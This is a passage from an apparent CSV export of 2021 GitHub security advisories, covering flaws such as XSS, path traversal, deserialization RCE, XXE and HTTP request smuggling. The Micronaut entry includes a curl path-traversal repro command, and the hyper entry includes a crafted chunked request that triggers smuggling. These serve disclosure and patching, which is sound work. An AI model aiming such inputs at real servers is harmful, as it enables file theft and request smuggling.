+**Note:** Custom `text`, `help` and `info` queries in blueprints are *not* escaped in 3.5.7. We support HTML in these properties because there are valid use-cases for custom formatting. However there can still be XSS vulnerabilities depending on your use of these properties. In Kirby 3.6 we will provide a new feature that will make it much easier to control whether you want to allow HTML from query placeholders.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.5.6'}}]","[{'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/security/advisories/GHSA-2f2w-349x-vrqm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32735'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/commit/f5ead62f8510158bed5baf58ca0e851875778a09'}, {'type': 'PACKAGE', 'url': 'https://github.com/getkirby/kirby'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.5.7'}]","{'cwe_ids': ['CWE-80'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T16:38:10Z', 'nvd_published_at': '2021-07-02T15:15:00Z'}"
+1.4.0,GHSA-xcqr-9h24-vrgw,2021-07-26T21:13:31Z,2021-07-26T21:19:37Z,,['CVE-2020-8827'],Improper Restriction of Excessive Authentication Attempts in Argo API,"As of v1.5.0, the Argo API does not implement anti-automation measures such as rate limiting, account lockouts, or other anti-bruteforce measures. Attackers can submit an unlimited number of authentication attempts without consequence.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/util/cache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8827'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/pull/3369'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/pull/3404'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/commit/35a7350b7444bcaf53ee0bb11b9d8e3ae4b717a1'}, {'type': 'WEB', 'url': 'https://argoproj.github.io/argo-cd/operator-manual/user-management/#disable-admin-user'}, {'type': 'WEB', 'url': 'https://argoproj.github.io/argo-cd/security_considerations/'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo/releases'}, {'type': 'WEB', 'url': 'https://www.soluble.ai/blog/argo-cves-2020'}]","{'cwe_ids': ['CWE-307'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:13:31Z', 'nvd_published_at': '2020-04-08T20:15:00Z'}"
+1.4.0,GHSA-cjx7-399x-p2rj,2021-07-28T15:37:18Z,2021-07-26T21:15:08Z,,['CVE-2021-32769'],Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in micronaut-core,"With a basic configuration like
+
+```yaml
+router:
+ static-resources:
+ assets:
+ enabled: true
+ mapping: /.assets/public/**
+ paths: file:/home/lstrmiska/test/
+```
+
+it is possible to access any file from a filesystem, using ""/../../"" in URL, as Micronaut does not restrict file access to configured paths.
+
+**Repro Steps**
+- create a file test.txt in /home/lstrmiska
+- start micronaut
+- execute command
+`curl -v --path-as-is ""http://localhost:8080/.assets/public/../test.txt""`
+
+
+### Impact
+
+Micronaut can potentially leak sensitive information.
+
+See https://cwe.mitre.org/data/definitions/22.html
+
+### Patches
+
+```
+diff --git a/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java b/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java
+index 2f5a91403..19d3b7f05 100644
+--- a/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java
++++ b/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java
+@@ -69,6 +69,9 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader
+ @Override
+ public Optional getResourceAsStream(String path) {
+ Path filePath = getFilePath(normalize(path));
++ if (pathOutsideBase(filePath)) {
++ return Optional.empty();
++ }
+ try {
+ return Optional.of(Files.newInputStream(filePath));
+ } catch (IOException e) {
+@@ -79,7 +82,7 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader
+ @Override
+ public Optional getResource(String path) {
+ Path filePath = getFilePath(normalize(path));
+- if (Files.exists(filePath) && Files.isReadable(filePath) && !Files.isDirectory(filePath)) {
++ if (!pathOutsideBase(filePath) && Files.exists(filePath) && Files.isReadable(filePath) && !Files.isDirectory(filePath)) {
+ try {
+ URL url = filePath.toUri().toURL();
+ return Optional.of(url);
+@@ -117,4 +120,15 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader
+ private Path getFilePath(String path) {
+ return baseDirPath.map(dir -> dir.resolve(path)).orElseGet(() -> Paths.get(path));
+ }
++
++ private boolean pathOutsideBase(Path path) {
++ if (baseDirPath.isPresent()) {
++ Path baseDir = baseDirPath.get();
++ if (path.isAbsolute() == baseDir.isAbsolute()) {
++ Path relativePath = baseDir.relativize(path);
++ return relativePath.startsWith("".."");
++ }
++ }
++ return false;
++ }
+ }
+--
+
+```
+
+### Workarounds
+
+- do not use ** in mapping, use only * which exposes only flat structure of a directory not allowing traversal
+- run micronaut in chroot (linux only)
+
+### References
+
+See https://cwe.mitre.org/data/definitions/22.html
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Github](https://github.com/micronaut-projects/micronaut-core/issues)
+* Email us at [info@micronaut.io](mailto:info@micronaut.io)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.micronaut:micronaut-http-server-netty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-cjx7-399x-p2rj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32769'}, {'type': 'WEB', 'url': 'https://github.com/micronaut-projects/micronaut-core/commit/a0cfeb13bf1ef5d692d16d4a3b91b34b7456bb11'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-22T20:25:11Z', 'nvd_published_at': '2021-07-16T19:15:00Z'}"
+1.4.0,GHSA-gm2x-6475-g9r8,2021-07-13T14:57:56Z,2021-07-02T18:32:18Z,,['CVE-2021-32737'],XSS Injection in Media Collection Title was possible,"### Impact
+
+A logged in admin user was possible to add a script injection (XSS) in the collection title which was executed.
+
+### Workarounds
+
+Manual patching the js files.
+
+### For more information
+
+If you have any questions or comments about this advisory:'
+
+ - Email us at [security@sulu.io](mailto:security@sulu.io)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.41'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-gm2x-6475-g9r8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32737'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/releases/tag/1.6.41'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T18:03:48Z', 'nvd_published_at': '2021-07-02T18:15:00Z'}"
+1.4.0,GHSA-rgcm-rpq9-9cgr,2021-07-27T15:13:34Z,2021-07-28T17:57:09Z,,['CVE-2020-7964'],Missing Authentication for Critical Function in Saleor,"An issue was discovered in Mirumee Saleor 2.x before 2.9.1. Incorrect access control in the checkoutCustomerAttach mutations allows attackers to attach their checkouts to any user ID and consequently leak user data (e.g., name, address, and previous orders of any other customer).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7964'}, {'type': 'WEB', 'url': 'https://github.com/mirumee/saleor/commit/233b8890c60fa6d90daf99e4d90fea85867732c3'}, {'type': 'WEB', 'url': 'https://github.com/mirumee/saleor/releases/tag/2.9.1'}]","{'cwe_ids': ['CWE-306'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:13:34Z', 'nvd_published_at': '2020-01-24T20:15:00Z'}"
+1.4.0,GHSA-m738-3rc4-5xv3,2021-07-02T16:44:24Z,2021-07-02T19:19:31Z,,['CVE-2021-32729'],A user without PR can reset user authentication failures information,"### Impact
+The script service method used to reset the authentication failures record can be executed by any user with Script rights and does not require Programming rights as it should have.
+Note that being able to reset the authentication failure record mean that an attacker with script right might use it to try performing a bruteforce attack since she'd been able to virtually deactivate the mechanism introduced to mitigate those attacks.
+
+### Patches
+The problem has been patched in version 12.6.8, 12.10.4 and 13.0.
+
+### Workarounds
+There's no workaround besides upgrading and being careful on which user should have Script right access. Note that any bruteforce attack on the authentication should be visible in the logs since the authentication failures are logged.
+
+### References
+https://jira.xwiki.org/browse/XWIKI-18276
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Jira](http://jira.xwiki.org)
+* Email us at [the security mailing-list](mailto:security@xwiki.org)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-security-authentication-script'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.6'}, {'fixed': '12.6.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-security-authentication-script'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.7'}, {'fixed': '12.10.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m738-3rc4-5xv3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32729'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-18276'}]","{'cwe_ids': ['CWE-287', 'CWE-693', 'CWE-732'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T16:44:24Z', 'nvd_published_at': '2021-07-01T17:15:00Z'}"
+1.4.0,GHSA-rqjw-p5vr-c695,2021-07-28T15:18:01Z,2021-07-19T15:21:41Z,,['CVE-2021-32770'],Basic-auth app bundle credential exposure in gatsby-source-wordpress,"### Impact
+The gatsby-source-wordpress plugin prior to versions 4.0.8 and 5.9.2 leaks .htaccess HTTP Basic Authentication variables into the app.js bundle during build-time. Users who are not initializing basic authentication credentials in the gatsby-config.js are not affected.
+
+Example affected gatsby-config.js:
+```
+ resolve: 'gatsby-source-wordpress',
+ auth: {
+ htaccess: {
+ username: leaked_username
+ password: leaked_password,
+ },
+ },
+```
+
+### Patches
+A patch has been introduced in gatsby-source-wordpress@4.0.8 and gatsby-source-wordpress@5.9.2 which mitigates the issue by filtering all variables specified in the `auth: { }` section. Users that depend on this functionality are advised to upgrade to the latest release of gatsby-source-wordpress, run `gatsby clean` followed by a `gatsby build`.
+
+
+### Workarounds
+There is no known workaround at this time, other than manually editing the app.js file post-build.
+
+
+### For more information
+Email us at [security@gatsbyjs.com](mailto:security@gatsbyjs.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'gatsby-source-wordpress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'gatsby-source-wordpress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.9.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gatsbyjs/gatsby/security/advisories/GHSA-rqjw-p5vr-c695'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32770'}]","{'cwe_ids': ['CWE-200', 'CWE-522'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T20:28:20Z', 'nvd_published_at': '2021-07-15T19:15:00Z'}"
+1.4.0,GHSA-8vcr-vxm8-293m,2022-02-08T21:02:07Z,2021-07-22T19:48:13Z,,['CVE-2021-32013'],Denial of Service in SheetsJS Pro,SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (memory consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js (issue 2 of 2).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32013'}, {'type': 'WEB', 'url': 'https://floqast.com/engineering-blog/post/fuzzing-and-parsing-securely/'}, {'type': 'WEB', 'url': 'https://sheetjs.com/pro'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/xlsx/v/0.17.0'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T21:41:18Z', 'nvd_published_at': '2021-07-19T14:15:00Z'}"
+1.4.0,GHSA-vr5m-3h59-7jcp,2022-05-26T19:57:25Z,2021-07-01T17:01:59Z,,['CVE-2021-32736'],Prototype Pollution in think-helper,"### Impact
+
+The software receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
+
+### Patches
+
+`think-helper@1.1.3` patched it, anyone used `think-helper` should upgrade to `>=1.1.3` version.
+
+### References
+
+https://cwe.mitre.org/data/definitions/1321.html
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [thinkjs/thinkjs](https://github.com/thinkjs/thinkjs)
+* Email us at [i@imnerd.org](mailto:i@imnerd.org)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'think-helper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/thinkjs/think-helper/security/advisories/GHSA-vr5m-3h59-7jcp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32736'}, {'type': 'PACKAGE', 'url': 'https://github.com/thinkjs/think-helper'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:40:38Z', 'nvd_published_at': '2021-06-30T18:15:00Z'}"
+1.4.0,GHSA-hc33-32vw-rpp9,2021-10-21T14:14:24Z,2021-07-01T17:01:16Z,,['CVE-2021-29485'],Remote Code Execution Vulnerability in Session Storage,"### Impact
+
+A malicious attacker can achieve Remote Code Execution (RCE) via a maliciously crafted Java deserialization gadget chain leveraged against the Ratpack session store.
+
+If your application does not use Ratpack's session mechanism, it is not vulnerable.
+
+### Details
+
+Attackers with the ability to write to session data, can potentially craft payloads that deserialize unsafe objects, leading to the ability to remotely execute arbitrary code.
+This is known as an “[insecure deserialization](https://portswigger.net/web-security/deserialization)” vulnerability, or “gadget vulnerability”.
+
+Ratpack allows session data to be stored server side in an external system such as a relational database, or client side via user cookies.
+When using server side storage, the attacker would need to obtain the ability to write to the session data store.
+When using client side storage, the attacker would need to obtain the secrets used to encrypt and/or sign the session data stored in user cookies.
+
+Ratpack's session mechanism allows storing serialized objects, of arbitrary types.
+The type must be specified when writing the data and when reading, with data only deserialized when there is an exact type match.
+However, in the process of deserializing an object of a known/trusted/deserialization-safe type, it may attempt to deserialize unsafe types.
+
+By default Ratpack uses Java's built-in serialization mechanism, though other serialization providers can be used.
+The exact types of payloads required to enable an exploit depend on the exact serialization mechanism used.
+
+To mitigate this vulnerability, Ratpack now employs a “strict allow-list” when deserializing (and serializing) objects to session data.
+All concrete types of objects serialized must be explicitly declared as safe.
+Some standard well known JDK types are registered by default.
+
+Serialization is provided by implementations of [`SessionSerializer`](https://ratpack.io/manual/1.9.0/api/ratpack/session/SessionSerializer.html).
+Its existing methods have been deprecated, and replaced with a [new methods](https://ratpack.io/manual/1.9.0/api/ratpack/session/SessionSerializer.html#deserialize(java.lang.Class,java.io.InputStream,ratpack.session.SessionTypeFilter)) that accept a [`SessionTypeFilter`](https://ratpack.io/manual/1.9.0/api/ratpack/session/SessionTypeFilter.html) that can be used to assert whether a type is allowed when serializing and deserializing.
+
+The default serializer implementation has been updated to use this mechanism.
+Any proprietary implementations should also be updated to consult the type filter _before_ serializing or deserializing data.
+Warnings will be logged any time an implementation that does not implement the new methods is used.
+
+Upon upgrading to Ratpack 1.9, users of the built-in serialization mechanism will need to change their application to declare all types currently being serialized as being safe. This can be done using the new [`SessionModule.allowTypes()`](https://ratpack.io/manual/1.9.0/api/ratpack/session/SessionModule.html#allowTypes(com.google.inject.Binder,java.lang.Class...)) method. Please see its documentation for details...))
+
+### Patches
+
+Ratpack 1.9.0 introduces a strict allow-list mechanism that mitigates this vulnerability when used.
+
+### Workarounds
+
+The simplest mitigation for users of earlier versions is to reduce the likelihood of attackers being able to write to the session data store.
+
+Alternatively or additionally, the allow-list mechanism could be manually back ported by providing an alternative implementation of `SessionSerializer` that uses an allow-list.
+
+### References
+
+ - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
+ - https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.ratpack:ratpack-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/security/advisories/GHSA-hc33-32vw-rpp9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29485'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratpack/ratpack'}, {'type': 'WEB', 'url': 'https://mvnrepository.com/artifact/io.ratpack/ratpack-core'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:46:45Z', 'nvd_published_at': '2021-06-29T19:15:00Z'}"
+1.4.0,GHSA-5h46-h7hh-c6x9,2021-09-07T21:47:36Z,2021-07-12T16:55:37Z,,['CVE-2021-32714'],Integer Overflow in Chunked Transfer-Encoding,"### Summary
+
+hyper's HTTP server and client code had a flaw that could trigger an integer overflow when decoding chunk sizes that are too big. This allows possible data loss, or if combined with an upstream HTTP proxy that allows chunk sizes larger than hyper does, can result in ""request smuggling"" or ""desync attacks"".
+
+### Vulnerability
+
+Example:
+
+```
+GET / HTTP/1.1
+Host: example.com
+Transfer-Encoding: chunked
+
+f0000000000000003
+abc
+0
+
+```
+
+hyper only reads the rightmost 64-bit integer as the chunk size. So it reads `f0000000000000003` as `3`. A loss of data can occur since hyper would then read only 3 bytes of the body. Additionally, an HTTP request smuggling vulnerability would occur if using a proxy which instead has prefix truncation in the chunk size, or that understands larger than 64-bit chunk sizes.
+
+Read more about desync attacks: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
+
+### Impact
+
+To determine if vulnerable to _data loss_, these things must be true:
+
+- **Using HTTP/1.1.** Since HTTP/2 does not use chunked encoding, it is not vulnerable.
+- **Using hyper as a server or client.** The body would be improperly truncated in either case.
+- **Users send requests or responses with chunk sizes greater than 18 exabytes**.
+
+To determine if vulnerable to _desync attacks_, these things must be true:
+
+- **Using an upstream proxy that allows chunks sizes larger than 64-bit.** If the proxy rejects chunk sizes that are too large, that request won't be forwarded to hyper.
+
+### Patches
+
+We have released the following patch versions:
+
+ - v0.14.10 (to be released when this advisory is published)
+
+### Workarounds
+
+Besides upgrading hyper, you can take the following options:
+
+- Reject requests manually that contain a `Transfer-Encoding` header.
+- Ensure any upstream proxy rejects `Transfer-Encoding` chunk sizes greater than what fits in 64-bit unsigned integers.
+
+
+### Credits
+This issue was initially reported by [Mattias Grenfeldt](https://grenfeldt.dev/) and Asta Olofsson.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/security/advisories/GHSA-5h46-h7hh-c6x9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32714'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyperium/hyper'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0079.html'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-07T20:05:15Z', 'nvd_published_at': '2021-07-07T20:15:00Z'}"
+1.4.0,GHSA-2363-cqg2-863c,2021-08-26T19:57:42Z,2021-07-27T19:02:56Z,,['CVE-2021-33813'],XML External Entity (XXE) Injection in JDOM,"An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request. At this time there is not released fixed version of JDOM. As a workaround, to avoid external entities being expanded, one can call `builder.setExpandEntities(false)` and they won't be expanded.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jdom:jdom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33813'}, {'type': 'WEB', 'url': 'https://github.com/hunterhacker/jdom/pull/188'}, {'type': 'WEB', 'url': 'https://github.com/hunterhacker/jdom/commit/dd4f3c2fc7893edd914954c73eb577f925a7d361'}, {'type': 'WEB', 'url': 'https://alephsecurity.com/vulns/aleph-2021003'}, {'type': 'PACKAGE', 'url': 'https://github.com/hunterhacker/jdom'}, {'type': 'WEB', 'url': 'https://github.com/hunterhacker/jdom/releases'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r21c406c7ed88fe340db7dbae75e58355159e6c324037c7d5547bf40b@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5674106135bb1a6ef57483f4c63a9c44bca85d0e2a8a05895a8f1d89@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6db397ae7281ead825338200d1f62d2827585a70797cc9ac0c4bd23f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r845e987b7cd8efe610284958e997b84583f5a98d3394adc09e3482fe@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89b3800cfabb1e773e49425e5d4239c28a659839a2eca6af3431482e@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb7a93e40ebeb1e0068cde0bf3834dcab46bb1ef06d6424db48ed9fd@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/06/msg00026.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00012.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AH46QHE5GIMT6BL6C3GDTOYF27JYILXM/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EWFVYTHGILOQXUA7U3SPOERQXL7OPSZG/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T19:02:41Z', 'nvd_published_at': '2021-06-16T12:15:00Z'}"
+1.4.0,GHSA-8mq9-fqv8-59wf,2021-08-31T21:22:31Z,2021-07-22T19:34:43Z,,['CVE-2021-32667'],Cross-Site Scripting in Page Preview,"> ### Meta
+> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC` (5.0)
+
+### Problem
+Failing to properly encode _Page TSconfig_ settings, corresponding page preview module (_Web>View_) is vulnerable to persistent cross-site scripting. A valid backend user account is needed to exploit this vulnerability.
+
+### Solution
+Update to TYPO3 versions 9.5.28, 10.4.18, 11.3.1 that fix the problem described.
+
+### Credits
+Thanks to TYPO3 core merger Oliver Bartsch who reported and fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2021-009](https://typo3.org/security/advisory/typo3-core-sa-2021-009)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.28'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-8mq9-fqv8-59wf'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-8mq9-fqv8-59wf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32667'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-009'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-20T17:02:53Z', 'nvd_published_at': '2021-07-20T15:15:00Z'}"
+1.4.0,GHSA-4f26-v6fr-9hmp,2022-04-01T20:24:30Z,2021-07-28T17:52:45Z,,['CVE-2019-16405'],Improper Input Validation in Centreon Web,Centreon Web 19.04.4 allows Remote Code Execution by an administrator who can modify Macro Expression location settings.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '18.10.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '19.0.0'}, {'fixed': '19.04.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16405'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/pull/7864'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/pull/7884'}, {'type': 'WEB', 'url': 'https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-18.10.html'}, {'type': 'WEB', 'url': 